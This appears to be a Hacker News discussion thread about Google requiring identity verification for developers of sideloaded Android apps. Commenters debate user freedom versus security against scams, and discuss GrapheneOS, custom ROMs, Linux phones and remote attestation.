For now, maybe. Like all discussions on freedoms and rights it's usually not about the day to day impact or the average person, if we optimized for the average person, we'd be in a sorry state.
> And they believe it.
Two reasons: they are not educated about devices they use, desktop operating systems are still awful at security (exe from a mail attachment can have a pdf looking thumbnail, executed with two clicks, even if accidental, immediately gets access to all user files... the whole concept of antivirus software...). It has nothing to do with side loading, especially on Android, where sideloading is a very explicit action already, and then you need to allow the application to do harm.
> Giving them the power to run any software they want, also means giving everyone else the power to make them run any software they can be tricked into installing.
You are taking away people's agency. Either you get to control your bank account risking that you get scammed, or someone will control it for you.
> very explicit action already, and then you need to allow the application to do harm.
So the email they get which tells them about the 3 viruses also contains a phone number where a "nice tech support person" will walk them through the steps of side-loading the "anti-virus app". You'd be surprised at what warnings/permission boxes people will blindly accept when they think they're talking to someone from Microsoft or Google's tech support.
> You are taking away people's agency.
Agency they don't want and never use. It's taking away agency from people like us but for the average user, Google is taking away nothing they've ever cared about.
> Either you get to control your bank account risking that you get scammed, or someone will control it for you.
I was just saying a couple of days ago that we need a service for old people where any transaction above a certain configurable threshold (for example, $500 in a day) has to be approved by an employee of this service who serves as a neutral 3rd party whose sole function is to try to prevent scams. That way the old folks would still have their agency so they can go out and buy all the hot-rods and transistor radios they want but if they're about to wire money to "Microsoft" then the anti-scam-company would step in and prevent that transaction (or at least require the old person have a discussion about why it's an obvious scam first before eventually allowing the transaction through depending on the client).
Whether this change actually takes control away from us remains to be seen. For example, I don't see anything in the article that suggests we wouldn't be able to install a custom ROM with the signature check removed. Personally, I already run GrapheneOS so I expect I actually won't be impacted by this at all.
> For the average user, device integrity is more valuable (by a lot) than side loading.
Right until their devices start to act against their will.
The device integrity you are talking about is integral only to Google and Apple. Not to you.
Agreed. Most people don't care that they can't run "unauthorized app XYZ", as long as their bank account / vacation pics / texts don't leak.
Now, that may happen anyway, but they'll give up a TON to avoid that.
Me, I try to avoid using my phone for anything important, use a VPN under Linux at home whenever possible, ad blockers, privacy guard, etc, etc. I can't expect my non-technical family members to do that.
Bad car analogy coming up: MOST drivers benefit more from ABS than the few really, really good race car drivers who can do threshold braking and outbrake ABS - and even then, I doubt it's true for anything but the earliest ABS systems. I'll bet the newest ABS systems are better than almost any human - because they don't have an off day, don't get distracted, etc.
And I get the anger - I'm an old school Atari 800xl / ST / DOS / Linux user who tries to ditch Windows where possible. Restricting things seems heavy-handed - and I don't trust Google in the least. But I would NEVER tell anyone in my family to sideload an app, even though they're all Android users - I don't want that support burden.
But this is not about device integrity.
I'm all for code signing and integrity verification. We need both technologies on pretty much all devices.
You are just conflating two different issues - side loading has nothing to do with device integrity.
Then they should go buy a boomerphone that can make calls and text and nothing else and stop screwing things up for the rest of us.
Average users also benefit from restricting their ability to purchase alcohol or tobacco, but I don’t see anyone suggesting that…
And people who are financially interested in letting users side-load apps (malicious or otherwise) are good at what they do. I mean, even Russian banks that are banned from the Apple App Store are still finding ways to distribute iPhone apps.
Most users are oblivious around those issues, how can they possibly make an informed choice here?
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
Why, though?
There's certainly no technical reason that a pocket appliance can't be a full fledged computer. The primary reason it isn't is because device manufacturers benefit greatly from having a tight control over their products. This is not unique to mobile devices; we see the same trend of desktop operating systems becoming increasingly user hostile as well.
The claim that these features are in the best interest of users is an inane excuse. Operating systems can certainly give users the freedom to use their devices to their full capabilities, without sacrificing their security or privacy. There are many ways that Google could implement this that doesn't involve being the global authority over which apps users are allowed to install. But, of course, they are in the advertising business, where all data that can be collected, must be collected.
Don't pretend that average users are asked, or that their opinions would matter. Or even that you have some sort of insight into the average user that other people don't have.
People who think this is unacceptable are the people who 1) understand what it is, 2) don't stand to profit from it, and 3) don't dream about locking average users into an ecosystem that they control some day.
You say this as if the widespread embrace of Apple/locked down Android phones is meaningless, fully a bamboozle with no user choice reflected at all.
The EU is some kind of Jekyll and Hyde entity, you can never be sure which way it will go next.
EU loves regulation. And it's much easier to regulate things when there are a few large providers that can be mandated to enforce your laws.
Remind me again why we can't use HTTPS certificates to sign code that is linked with a domain?
Time for Linux phones with Android emulation
This seems like the only sensible long-term solution to me unless anyone else has an alternative. AOSP public access is already on the chopping block, custom ROMs are the short term solution but still operate at Google's whim under the hood.
How does this affect installing an APK to an offline device?
Will there be a local override?
"Monopolies" gonna monopolize, all for our safety, of course
It seems that it was only about time… it just feels like the pace of enshittification with big tech being able to get away with anything is crazy!
I’m hoping that projects like Precursor can take off because we’ve buried ourselves in such mountain of complexity that seems like only a billion/trillion dollar big tech company can make an OS.
But then again, somebody called BS on browsers and we might have a good option soon in Ladybug!
https://www.crowdsupply.com/sutajio-kosagi/precursor
I rely on an open source app called xDrip to manage my diabetes. It's way way way better than any of the official apps. It's not distributed on the app stores for obvious reasons. Many others rely on this app as well. Are we cooked?
>However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option.
Don't be evil Google!
So that's how they kill newpipe.
They want to stop adblocking YouTube apps
So Google won't even offer a system toggle to let users install an app they've made or copied?
Google don't even expose a per-app toggle for app Internet access, why am I surprised?
This is disgusting.
Freedom died a little bit more today.
Why is end-user choice and consent not considered?
It's really disturbing that the EU and Google would do this.
I can't recommend Android or iPhone because of this nonsense.
> Why is end-user choice and consent not considered?
The elimination of user choice was very much considered. In fact, it's the primary goal.
Our only choices are 2 American companies, Google or Apple
Why did we let that happen?
With more and more things like this, we need to go back to making native apps on desktops and laptops where we as the users are in control.
Anyone else remembers “don’t be evil”?
GrapheneOS.
wow that rather fast [https://ibb.co.com/8LF8qdxm]
I already got popup in dashboard this morning
I'm waiting for this with chromium too. Microsoft Edge most removed uBlock Origin on me today.
https://www.gnu.org/philosophy/right-to-read.en.html
It is funny how true this becomes with passing day.
This eliminates the appeal of Android over iOS.
I'm curious what is going to happen to all those Chinese ROMs and third-party Chinese app stores.
China will push own Android OS forks into other markets even harder, if they do it fully open-source then bonus for them, users will force devs (banking apps etc) to get more support. A good example is one EU bank which publishes to Huawei's AppGallery to support non-Google certified Android phones.
This means that for example I will not be able to side load Popcorn Time for Android [1] anymore?
[1] https://github.com/popcorn-official/popcorn-android
The day this happens is the day I stop using "certified Android devices."
You know how folks in the UK are cutting the surveillance cameras, what is the equivalent here?
making an ADB-based debloater and browser shims to use stuff like bank apps, then sharing that with others. Then again, like cutting wires, it doesn't address the root cause.
Not updating Android I guess
"Google to prevent users from installing programs on Android phones."
This might do more good than harm, since I'm willing to believe that scams involving APKs are prevalent, but come on. I need your permission to install software on my phone? Are you sure it isn't just that you want more control over everyone's phones?
Everybody complaining of this is admitting they are doing nefarious actions. Those of us playing by the rules see no issue with this - In fact I welcome it!
Great. I suspect this will push more developers to publish web apps.
Yeah if this goes ahead I'm going back to my feature phone
I see... I guess it's just... web apps then?
Tech like f-droid will be important for the future of free Android
Well I guess that's good bye Pixel and Android for me then.
Maybe it's time to stop using an OS developed by an advertising company.
(Responding to https://techcrunch.com/2025/08/25/google-will-require-develo... )
> Starting next year, Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store.
Odd little phrase, "distributing their apps on Android devices".
I think "distributing" in this context is in the sense of product distribution, not in the sense of distributed systems.
But "distributing...on" sounds a little odd, like Google is still providing a distribution service. (Contrary to all the precedent of how we've thought of installing software, other than the proprietary, captive-user app stores.)
And so, maybe "distributing...on" makes it sound more like Google is (once again) entitled to gatekeep what you can run on your device/computer.
> However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option. Google says this will help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users’ personal data.
Maybe it's not "developers who appreciated the anonymity" (which we immediately try to conflate with bad actors), but that the whole point lately has been to stop the greedy proprietary lock-in app store monopolies, and not have them gatekeeping what everyone else can do.
"Distribute on" sounds odd because it's incorrect. APKs are not distributed by putting them on phones and carrying the phones from one place to another. "Distribute to" would be more correct; better yet, "develop for".
This is the final nail in the coffin for personal computing
It's a blow, but this is over dramatic.
This aligns with their AOSP recent changes.
This is another "beginning of the end." All eyes are on this situation and how much push back it gets. If there is little resistance, others will certainly follow suit.
How will this affect GrapheneOS?
Google welcome to Apple 10 years ago
Another instalment of HN thread where people try their best to pretend that "security" does not come with "enforced, ideally at hardware level, inability to run random code" for 99% of phone users.
Here's a tip: you won't solve the problem of security by just whining about corporate interests (which is a real concern) and NOT proposing a better solution that works for an average tech illiterate, very socially engineerable person trained to ignore every warning screen. And no, a root switch is not that solution because it will be flipped on day 1.
This doesn't seem to be going over well.
Only developers care. The users don't even know what sideloading is. This will successfully kill off the single remaining freedom users have.
This is actually good if it hopefully paves way for breaking them up
Imagine you develop a VPN app that specifically helps people evade government censorship.
Everyone can figure out what's going to happen next.
> Google is explicit today about how “developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer.”
« Developers will have freedom » yet they are entitled to Google’s verification.
It’s just another stone in the grave of Android and even though I shipped off this sinking ship 6 years ago to iOS, this is still concerning because ultimately Apple’s iOS is in competition solely with Android.
If Android gets so bad it has all the disadvantages of iOS, and some more, for instance with the embedded spyware that manufacturers are paid to include, and none of the good sides of iOS, then everyone loses. Apple doesn’t have to compete anymore, they just have to not suck.
Can you even compile an iOS app without registering with apple?
Without an apple ID you can compile an iOS app, but can only run it in an iPhone Simulator on a Mac.
With a free apple ID (no additional registration needed) you can also install your compiled iOS app on your iPhone and have it working for 7 days before you need to re-install it.
Is it really different from what Google is doing? Not being able to compile or the user not being able to install has the very same consequence: your app can’t be used.
This will be just another boost for de-googled phones, alternative platforms and potentially Mobile Linux.
The only reason why google phones became so popular was the fact that they were much less restrictive than iPhones. Thus the platform became the biggest phone platform in the world.
Now they are asking for a new start to arise and take their place.
Sorry, folks, the good times are over. The future of computing is a signed, attested chain of trust from boot firmware through application code, on all platforms people are likely to use -- and remote attestation with user identification if you wish to connect to the network. End users love it because it prevents or reduces all sorts of malicious activity, from bank fraud down to online game cheating, with little to no effort on their part; platform vendors love it because it provides a moat; service providers (banks and such) love it for the assurance that their clients are uncompromised; and governments love it because it lets them surveil users and developers.
The only ones who hate it are devs. And who really cares about a bunch of nerds?
Remember, general purpose computing really boils down in security terms to "arbitrary code execution" -- a bad thing in the infosec field.
If this goes through, would it be possible to see a consumer class-action lawsuit? I imagine there is a class of people for whom the sideloading of apps is necessary and removing it renders their phone almost useless. I'd also guess that this market is much larger than Google imagines.
Personally, if I'm not allowed to run the software that I want on my phone, it almost makes more sense for me to get some old flip phone or one of those chinese blackberry knockoffs c.a. 2012. Not out of any principled stance, mind you, it's just that's the level of functionality you'd be reducing me to. Why should I pay $500 when I can find something that gives me the same features on a literal junk pile?
This isn't legal in the EU is it?
It is. Notarization like Apple does is also legal. In fact the EU commission would welcome this with open arms since they can now access the personal data of every developer and can order Google to ban every app they want. This goes hand-in-hand with their new "Digital wallet" app that will be launched next year.
From the announcement
> our recent analysis found over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.
I will believe this when we stop seeing brazen malware in marquee app store apps, e.g. https://www.tracesecurity.com/blog/articles/meta-pixel-and-t...
Of course they will. It started with Play Integrity and hardware remote attestation. Soon Android will be nothing but a shittier version of iOS.
Oh how I wish I could buy a Nokia N900 16 Pro Max and use Maemo 13
The N900. The best mobile device I've ever owned.
Fuck google.
This combined with the 'age verification' coming to all Google properties means it is a very small step from that new world to full Google verification of everything you visit and everything on your device, at any time, for any reason with the penalty being incontestable ban from your device, apps and data.
Get ready for facebook style 'we are interrupting you for a video selfie because we have detected you are a threat' across all google properties (Android, Chrome, Gmail, Maps...).
Move to linux phones, now.
No, fuck you. Absolutely not.
What the hell is a verified developer lol
This has the potential to be disastrous for Google, but maybe not.
Personally: I don't use Apple because I like being able to whip together little apps to side-load without having to check in with a walled-garden mothership. If Google is going to move closer to Apple in that regard... Apple's UX ecosystem is better, so I have far fewer reason to keep using Android.
I suspect this won't be disastrous for Google, because where will people who care about this go? Apple, who is even more restrictive? This is just another in a long series of incidents showing why we desperately need a real alternative to the mobile duopoly. I would ditch Android over this, but there's no realistic alternative available to me.
Damn the future sucks ass.
I think the only thing that can save us is a jailbreak. Either for iOS or Android to let you sideload apps.
Alternatively, and that’s almost bullshit, the dumb phone trend continues and we might get devices like PDAs. Get a dumb phone and a small camera and then your PDA for everything that is essentially an app. Not sure what OS they’d run but I don’t see another way.
Android also allows apps that can run arbitrary code, like emulators and various other runtimes. I think iOS still doesn't? I have not written an Android app in ages, other than at work, but I often write silly little things running in the Löve 2D Loader, or TIC-80, or DOSBox, or just command-line tools running in Termux (I hear there is an X-server as well to run GUI applications from Termux?).
As long as they still allow running stuff inside of apps like that I will probably not abandon ship yet.
They recently allowed emulators, like RetroArch, to be on the app store. They still require the emulators to be written in Swift AFAIK. Still quite a bit more restrictive than Android, but they have slowly been opening up.
Squeeze, Raban. Squeeze hard.
This phase from the last couple of years just had to come - and while it's painful to be exposed to it - it seems highly illogical for us to complain and cry about it.
- "Free" search - yay, let's all use it for everything and even make a verb out of it
- Email - such nice guys, Google - free email forever, what could go wrong if I have my 95% of all my info there
- Maps - yeah, let's all depend on these free Google maps with our lives
- Chrome - ofc, heck yes, let's all use their browser, it's the best and free - no need for anything else
- Google account login for EVERYTHING - so convenient! Google Authenticator app, Google Wallet - yes, more!
- Free mobile operating system - nice, take that, Apple!
Google has taken over a large portion of our lives, step by step - good enough services, on global scale, for free, until they became essential.
They are not evil, like they were never good - they are a company, and in the current socio-economic structure, that means having a duty to use their position to enrich their shareholders - and absolutely have no interest in people's wellbeing or morality or opinions or reputation - unless it temporarily serves to do so more / better.
I'm in no way trying to defend them. Just, with all the futility of it, pointing out how hyper-capitalism we've built/allowed to grow, has reached the stage where it's practically impossible for the "free market" to react / provide solutions that people want. Now the big players decide what people get.
In this case, you can no longer have a high quality phone of a good manufacturer and install on it what you want. Small manufacturers catering to that demographic won't get government certification, you can't have your e.g. Samsung and install a ROM anymore, and you can't install your app freely on Android unless Google lets you. That's all just in a tiny sliver of space.
Our Tetris board barely has any room left for choice and actions.
Relevant as always: https://youtu.be/ntICHMV-WMA?t=38
shameful
was a reason I bought Android. will they be sending me a refund?
I wonder, how hard is it to build an app on the phone from source?
Dick move. Go back to "do no evil" big G. Remember how you used to be the kool kid on the block? Now you've just become the grown up you showed contempt for in your prime time.
I doubt I'll move away from Android too soon, but that definitely makes me reconsider whether any Google services have a right to CPU time on my device.
Absolutely disgusting. No reason to keep using Android then.
iOS is a closed jail even worse. The real solution is to buy uncertified Chinese devices then.
China offering more freedom than the supposed free world
Source: https://android-developers.googleblog.com/2025/08/elevating-... (https://news.ycombinator.com/item?id=45016602)
I can’t say I’m surprised; but I am disappointed.
I don't understand, when the EU announced that Apple's "actually we need to sign all of these and pay us" requirement is illegal, Google was like "hold my beer"?
Break them up already, it's getting old.
So, now there will be a single kill switch where a malicious government can legally compel Google to annihilate apps not of their liking.
I find it hard to state how contemptible this is. How stupid. Everyone who worked on this has blood on their hands.
Could someone explain why the personal privacy of software developers is more important than the cybersecurity of consumers and nations please and thank you
Google is really turning into a dystopian company, destroying any goodwill their virtuous employees created in the past. It feels like they are primed to be the main turnkey tyranny facilitators.
Google was always dystopian and evil. They just wore good mask for some time in the beginning.
Keep your phone. All you have to do is say no to digital for:
- money
- tickets
- identification
They cannot force everyone to own and buy a phone.
Anyone even remotely privacy or security conscious needs to vote with their wallet in protest and stop buying Android phones, otherwise it's only a matter of time 'til Google bans side-loading and it becomes impossible to buy a phone that can run any kind of anonymous or end-to-end encrypted communication software.
Stop buying Android and what? Buy an iPhone that's even more locked down or live like an outcast that can't access essential services? Because those are the realistic options.
For years I've been buying middle-of-the-road Android phones because they provide pretty good bang for the buck, but if I can't use a computer I paid for however the fuck I want, I'm just going to start getting the cheapest crap I can get away with and use it as little as possible. "Vote with your wallet" doesn't have to mean total abstinence.
I think getting a flagship device that's a few years old probably makes for a better experience. I check the LineageOS supported devices list, then search eBay for something from there.
Flip phones can access essential services just fine, if some business or government office is only allowing something to be done via smartphone app, that’s a problem.
A problem for who? Go ahead and raise it, I’m sure the government office will get right on fixing it.
It really isn't that bad. I've never owned a smartphone, and can do everything I need through websites and the occasional phone call.
>live like an outcast that can't access essential services?
I don't own a smartphone and I am happy as ever. I used to own one a while back, but it wasn't worth the effort and the rage when it was slow.
If a service can be accessed only with a smartphone, I complain (which is of little use).
Do you not have to use a 2FA app for things like banking? In Singapore, they are phasing out 2FA options other than the banking app. The banking apps only work on iPhones and Google-approved Android phones. It's pretty bad.
It's kind of stupid when you consider the number of people who don't have screen locks (or else have easily guessable ones) on their phones.
> live like an outcast
in all things. I would encourage you and everyone who reads this post to stare down this option with realistic consideration. In a society this broken, it is the solution to more and more things. To checkout, to accept the hard mode because to pick the path of convenience is to be exploited.
Again, and again, and again.
I've been doing it. That's why I'm vegan.
I'm sorry, this is such a funny follow up comment, I literally lol-ed when I got to it.
Eating on hard-mode is what we do.
I respect at least your choice but I'm not growing tofu on the farm. Veganism is one of those protests that while i appreciate going after factory farms, you're only enabled to do so by large corporations.
You've never tried growing tofu? It pops out of the ground in little cubes. Super easy, barely an inconvenience.
> _I'm not growing tofu on the farm_
What else are you growing?
What if people stopped buying brand new Android phones and instead bought used ones and then installed alternative Android versions and app stores.
Can't access banks, ticket systems etc. unfortunately we are in the era of tightened screws, the freedom is running out :(
Lol all these things work via the web. You just log on via the browser. Not everything needs an app.
In your country, maybe. Over here you're dead in the water without a smartphone — can't access banking except by going to the branch and standing in the queue for an hour or two, can't access most government services. Limit your selection of goods (like electronics, but not only that) by something like 90% (and also increase prices by 30-50%) because brick and mortar shops sell old crap at much higher cost than it was ever worth, and the only real solution is buying from a major marketplace which is only available as a mobile application.
This concept originated in China and is spreading. Beware.
Can I ask which country? You said originated in China but is it China or another east Asia country?
@achrono (I cannot reply to the other post, I don't know why). Yes, you can use just a web browser.
> Mobile Payments
They work with a card, no smartphone required. Moreover, cash didn't cease to exist.
> Navigation
Again, physical maps are a thing. Google Maps or OpenStreetMap are accessible by browser. Having a physical map and having to follow road signs can be a beautiful experience. If one is addicted to a machine that tells them where to go, navigators are still a thing (no smartphone required)
>All manner of IoT devices
Don't put an IoT device in your house if you don't know what it does and how it works. If the only way to interface to it is via an app... then you don't know what it does and how it works. Don't put it in your house.
>Wearables
I don't even know what are wearables: if I write it on Firefox it underlines it in red. By doing a quick search, I can see images of watches. Watches can work without an app. Moreover, watches that work without an app are usually less expensive than the other kind.
>Digital versions of ID (Mobile Passport Control)
Don't. I know that some governments are pushing this crap thinking it's the future. Simply don't. Imagine you're at the airport and you accidentally drop your passport. You pick it up, nothing lost. Imagine you drop your phone and it stops working. You lost:
- Your documents
- Your money (if you rely on your phone for paying and don't have cash with you, which seems a growing trend among people I know)
- All your ways to contact people for help
Instead:
- Your wallet is stolen: you lost all your money and your cards, but you have your documents (at least the passport because it surely does not fit a wallet).
- Your phone is stolen: you lost all the ways to contact people, but you can buy another one
- Your passport is stolen: you can contact your embassy.
Smartphones are becoming a SPOF (Single Point Of Failure) for our lives.
> physical maps
Are you for real? I'm totally on board with using free and open alternatives, but if you're not going on a mountain trail then a physical map is going to be drastically worse than any navigation software.
Also FWIW I have a card-sized passport that I can easily get stolen with my wallet.
Other than banks & ticketing, there is a whole host of things that do in fact need an app.
* Mobile payments
* Navigation
* All manner of IoT devices
* Wearables!
* Digital versions of ID (Mobile Passport Control)
etc.
So no, you can't just use the web.
But, and I hesitate to point it out, because I am finding that people think it is somehow minimal entry stakes, one does not need any of those things..
You wouldn't get very far without WeChat and AliPay in China. Last time a good friend of mine was there, many merchants simply refused to accept cash. The few that did had made it known how much they were inconvenienced by doing that.
Same for basically every interaction with locals, for accessing government services, or even just using the public transportation.
It's pretty similar for locals AFAIK.
And before anyone replies that he didn't have to travel there — no, he did, unless he was willing to look for another job (which are very sparse here, you hold on to a good job for dear life).
Aren't there attestation frameworks under development that they could start using too?
The 2FAs require their mobile app sometimes.
What types of tickets are you referring to here? I’m not familiar with that restriction.
He's talking about concert tickets and similar entertainment events, where several of the major providers no longer provide PDF tickets and instead only send them to a phone app. It is possible to make enough of a stink and collect tickets on the day, but that option is increasingly difficult to find.
you can usually just use the web-interfaces for those services. less convenient, sure, but the options are there.
Buy Apple; the point is to hurt Google. If enough people do it, Google might reconsider. Show them that the open ecosystem is the only value Android added, and if they refuse to bring back the open ecosystem then their platform will slowly die. Won't be long until Google's as locked-down as Apple at this rate, so all Android gives you is a power-hungry OS that protects your privacy even less than iOS does.
Buying closed stuff to show we want an open ecosystem?
At this point, I believe the most effective ways one can help with this is:
(1) advocacy - it's slow and difficult, but having people at least agree / be familiar with the idea that closed stuff is bad is a good first step.
Open ecosystems can't work for the general public if it's trapped in closed networks that won't work on anything else than the two big mobile operating systems, so making people start using open chat apps and such will help a lot. It'll take years, but so be it. It's worth it I think.
(2) helping improve the more open stuff.
I think Linux mobile for instance is a potentially viable alternative in the medium term for at least the basic use cases: Calls, SMS, GPS / Maps, Signal, photos. All this has no reason not to work with some polish. I daily drove Linux mobile 4 years ago for a year. The main thing I'm missing is good hardware for it, and a lot of polish but nothing impossible. Yeah, indeed, no payment with the phone (Google Pay / Apple Pay). But it's still possible to use the physical cards and not use the phone for this.
You've got to be kidding. Doesn't work, Apple is even more locked down than what this article announces. No sideloading whatsoever, signature checks à la Play Protect are mandatory and cannot be switched off, no alternative app stores, etc.
You can side load three apps at a time outside the EU and unlimited inside the EU.
Not sure why this is downvoted. The entire value proposition of Android is the semi-open OS. For things you can’t do with Apple devices, you use the myriad of Android devices out there.
A locked-down Android is pointless.
Yet most of the world runs Android. Its main value proposition was always wide selection of hardware for however much money you're willing to spend, not its relative openness.
I make relatively decent money by our standards, and I wouldn't even think about dropping $700-1000 on a phone (which isn't even officially sold or supported over here). For the vast majority of people it's their whole income over 2-4 months. I don't know or care how much you make, let's say it's $10k per month. Imagine if you had to pay $20-40k for a phone which is good for maybe 5-8 years.
And most of the world is like that.
I'm curious what you think the alternative is, because Apple is definitely a lot worse, and we all know they're very much a duopoly.
BTW, all the GrapheneOS, etc. are still Android phones.
I'm curious if GrapheneOS or other custom Android builds would be able to avoid these restrictions reasonably.
Obviously this is going to impact the supply of apps, since the market share of custom Android is smaller than even the market share of people willing to sideload or use an alternative store on a mainstream Android phone. Many developers might quit the game.
The problem with custom ROMs is that many government, banking, and similar apps don't run on them without workarounds. Some of those apps also consider this as a TOS violation as well.
When Microsoft first proposed a remote attestation scheme for PCs under the name Palladium, it was widely seen as a nightmare scenario. Even the mainstream press was critical[0]. There was barely a whimper when Google introduced SafetyNet a decade later.
It wasn't OK in 2003. It wasn't OK in 2014. It isn't OK now. I'm just not sure what anybody can do about it.
[0] https://www.nytimes.com/2003/06/30/business/technology-a-saf...
What changed is that the vast majority of users in 2025 are retarded normies that have never even considered trying to understand how their pocket computers work. And now that they are the majority, the voice of people that have even a remote understanding of how any of this works get drowned in the noise of social media divisiveness. Divide and Conquer. Oldest play in the book.
There are many third-party money apps that log in to your online banking that are a violation of ToS. That doesn't stop people using them. In fact, when they get really big, they can be legitimised by banks. For example, to get my mortgage, I had to use a third-party service that logs in to my online banking account and ingests all my transactions to show that I saved for my deposit legitimately.
Then I won't run those apps. Seriously. I know not everyone has this option, but it's been my experience that a lot of processes do in fact have workarounds when you show them the cryptic error their poorly behaved app throws.
I have been a GrapheneOS user since the Pixel 3 and have yet to encounter an app that doesn't work on GOS.
I don’t use any utility apps (identity, banking, services etc) on my phone and stick to the desktop web. And don’t use services that do require me to have a Google or Apple account and phone. (Spoiler: I do)
I hope my tiny datapoint shows up in some aggregated stats somewhere.
It’s use-it-or-lose-it.
Looks like they can avoid these restrictions:
https://grapheneos.social/@GrapheneOS/115090818389369737
> "GrapheneOS doesn't include Google Mobile Services and the requirements for certification aren't relevant to us."
GrapheneOS uses a sandboxed version of Google Play Services, not the GMS certified devices they mentioned in the article.
I had a Jolla phone on my hands the other day and I must admit this…
SailfishOS is pretty nice
I might get one next
Buy Xperia 10 III while you still can. It's the best SailfishOS phone at the moment.
I have an Xperia 10 III, but it's running AOSP I built myself.
https://developer.sony.com/open-source/aosp-on-xperia-open-d...
Basically none of this new restriction will bother me, since I don't run anything but stock AOSP and get all my apps from f-droid repos.
Eventually you will need a new phone and by then probably all phones will be locked down.
It's really nice when you first use it but if you have to use it as a daily driver it's pure pain. Rather go for graphene.
GrapheneOS is a beautiful stop-gap, but there are real bona-fide Linux smartphones out there. To be clear, there are not many, the hardware often isn't great, the software often isn't great. PinePhone and Librem come to mind.
Cell carriers will just start requiring the attestation as well. And eventually, even an internet connection will - wifi routers will have to attest to ISP equipment, etc.
The final phase is "AI" monitoring everything you do on your devices. Eventually it won't just be passive, either, but likely active: able to change books you read and audio you listen to on-the-fly without your consent. It will be argued that this ok because the program is "objective".
At this point, I would stop using commercial cell carriers and ISP-provided equipment altogether, even if that means setting up mesh networks with an underground community. User control or bust.
I've been keeping an eye on FuriLabs (Furiphone). They maintain FuriOS - Debian with an Android kernel. Has a container for running Android apps. Price is reasonable though I don't know how it'll be affected by tariffs in the US. It's tempting.
https://furilabs.com/shop/flx1/
I really wanted to like Librem and almost bought a phone until I saw this video by Louis Rossmann: https://youtu.be/wKegmu0V75s?si=NzevsJgHD188bRkT
https://www.bunniestudios.com/blog/2020/introducing-precurso... This is the most secure phone that has been made recently.
Per their spec sheet it doesn't have cellular connectivity, so it's not actually a phone.
And if what you want is a PDA that runs Linux, there are many options, e.g. https://www.clockworkpi.com/home-uconsole.
Precursor is neat, but it isn't a phone.
Pretty sure Bunnie named it “precursor” because the plan is to make the actual phone (with a cellular modem) next. If I had the cash to support him and buy a Precursor I would.
Neat concept.
For anyone else failing to resolve DNS for that domain: https://archive.is/q7w0x
In addition to the PinePhone and Librem 5, you can also put postmarketOS on some faster Android phones like the OnePlus 6T.
>real bona-fide Linux
Android is decades ahead of that in security, functionality, utility, devex, and design. It's a fool's errand to try and modernize that, over building on top of AOSP.
The alternative is just Apple; if Google loses enough users they might reconsider. Essentially the only real advantage Android had over Apple was being a more free platform/ecosystem; if they're going to do away with that, then they should be shown that this means they'll lose a lot of users.
Even with this change, Android is still more free than iOS by far.
Utterly pointless.
Banking apps, messaging apps, streaming apps, even video games all want locked-down devices. They will use hardware cryptography to discriminate against us and refuse service if they can't cryptographically prove we're using a corporate-owned device.
Naughty user. Looks like you've been tampering with your device, installing unauthorized software and whatnot. Only money laundering drug trafficking child molesting terrorists do that. I'm gonna have to deny your request to log you into your bank account.
Gives me another reason to use Custom ROM
has anyone had to help any elderly relative with the million scams they've downloaded from google's app store? google does not give a shit about helping regular people avoid scams, it's all just bullshit.
not even to mention the h1b indian kickback stuff that's about to hit them. couldn't happen to a nicer company.
Helping elderly with scams: Yes, today, with Google Chrome. They got tricked into allowing desktop notifications and they look super legit on Microsoft Windows, styled like antivirus notifications and everything, covering the browser UI to get to the settings. I don't see how using closed software helps here
Sorry, we're getting rid of Revanced, Newpipe, Xmanager, etc. for your own good. Just like how Manifest v3 was for security. /s
That might be one of the reasons. Get rid of competition by legal means.
In my case I keep a copy of K9 Mail 5.6 with the original UI (the reason I choose K9) and I sideload it to every device of mine. I'm afraid that I'll have to register an account and what, claim that that K9 is mine?
TL;DR If you're not using Linux by now, do yourself a favor and start. You could do worse than starting with Linux Mint or PopOS, but whatever you do, get ahead of the curve and transition to these user-friendly open sourced OSes. The alternative is far, far worse at the moment.
Well time to make sure mobile Linux is accessible so the blind users aren't the only ones left when all the world switches to Linux /s
aren't there braille terminals that work with linux? I don't know how you would make a rigorous blind UX other than working with a text interface first.
Year of mobile Linux OS? /s
Maybe Elon Musk can save us /s
He won’t.
But China does, and not tomorrow, not in the future, but today already, by selling unrestricted devices
Seems reasonable